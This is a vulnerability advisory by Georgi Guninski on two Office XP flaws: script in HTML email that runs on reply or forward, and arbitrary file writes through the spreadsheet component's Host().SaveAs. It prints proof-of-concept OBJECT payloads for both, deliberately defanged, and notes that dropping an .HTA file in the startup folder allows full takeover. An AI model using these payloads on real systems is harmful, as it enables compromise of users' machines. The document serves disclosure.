|
|
|
|
| |
| Two new security vulnerabilities in Office XP has been discovered, one of the vulnerabilities will allow an attacker to cause an end user to execute arbitrary JavaScript automatically upon forwarding or replying to an email, the other allows saving of files to the user's local hard drive with the content we desire it to include. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Systems affected:
Office XP
There are at least two new vulnerabilities in Office XP:
1. It is possible to embed active content (Object and Script) in HTML based emails that is triggered if the user chooses to reply or forward the email.
2. A bug in Microsoft's Spreadsheet component allows saving of local files to anywhere on the user's hard drive and to control the content of that file.
The vulnerability is caused by the Host() function (this vulnerability can be exploited remotely with the help of vulnerability #1). The Host() function allows creating of files with arbitrary names and control their content. This is sufficient to place an executable file (.HTA) in user's startup directory that would in turn allow taking full control over user's computer (This probably may be called Cross Application Scripting because one application uses object from another application).
Exploit:
Vulnerability #1:
Placing the following inside an HTML email, and sending it to an Outlook XP user will cause the user whenever he chooses to reply or forward, to execute the embedded JavaScript:
--------------------------------------
<0BJECT id=WebBrowser1 height=150 width=300 classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random<scr!pt>while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------
(NOTE: Both the letter O and I have been replaced with 0 and ! accordingly).
Vulnerability #2:
The Office spreadsheet component is something like a mini Excel. It can be embedded both in web pages and in Office documents.
The Office spreadsheet component supports the Host() function that in turn returns the hosting object. Placing such a formula as '=Host().SaveAs("name")', will cause the spreadsheet object to create a file called 'name'. This opens the user's machine to an attack.
Example:
<h1>
Hehe. Trying to sell trustworthy computing.
</h1>
<0BJECT
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?>
<ss:Workbook xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style ss:ID="Default">
<ss:Alignment ss:Horizontal="Automatic" ss:Rotate="0.0" ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName="Arial" ss:Size="10" ss:Color="Automatic" ss:Bold="0"
ss:Italic="0" ss:Underline="None"/>
<ss:Interior ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection ss:Protected="1"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0" ss:DefaultRowHeight="12.75">
<ss:Row>
<ss:Cell ss:Formula='=HOST().SaveAs("C:\GGGG5")'>
<ss:Data ss:Type="Boolean">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="file:///E:\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
(NOTE: The letter O of OBJECT has been replaced with a 0, to avoid execution).
Vendor status:
Microsoft was notified on 17 March 2002.
|
|
|
|
|
